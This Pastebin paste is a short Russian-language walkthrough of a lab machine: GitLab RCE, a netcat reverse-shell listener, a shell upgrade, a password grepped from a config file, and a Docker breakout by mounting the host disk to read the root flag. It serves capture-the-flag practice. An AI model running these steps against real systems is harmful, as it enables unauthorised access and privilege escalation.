Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- https://youtu.be/0ld0aRMtD18
- Сканируем 10.10.10.220
- Находим порт 5080
- Регистрируемся
- Читаем про уязвимости данной версии гитлаб
- https://www.cybersecuritywebtest.com/exploits-vulnerability/gitlab~1147remote~code~executi-49257
- Используем burp чтоб перехватить куки и юзеркей
- Заполняем уязвимость под себя
- nc -lvp 1234
- Запускаем её через пайтон и получаем шелл
- получаем юзера
- Делаем себе нормальный терминал
- python3 -c 'import pty; pty.spawn("/bin/bash")'
- export TERM=xterm
- Ищем флаг юзера
- находим и продолжаем поиск, находим
- cd /opt/backup
- ls
- cat gitlab.rb | grep pass
- находим пароль wW59U!ZKMbG9+*#h
- Попутно выясняем что мы в докер контейнере, читаем про докер
- https://book.hacktricks.xyz/linux-unix/privilege-escalation/docker-breakout
- Примаунтиваем фаловую систему и получаем доступ к флагу рута
- fdisk -l
- mkdir -p /mnt/hola
- mount /dev/sda2 /mnt/hola
- cd /mnt/hola
- cd root
- ls
- cat root.txt
Add Comment
Please, Sign In to add comment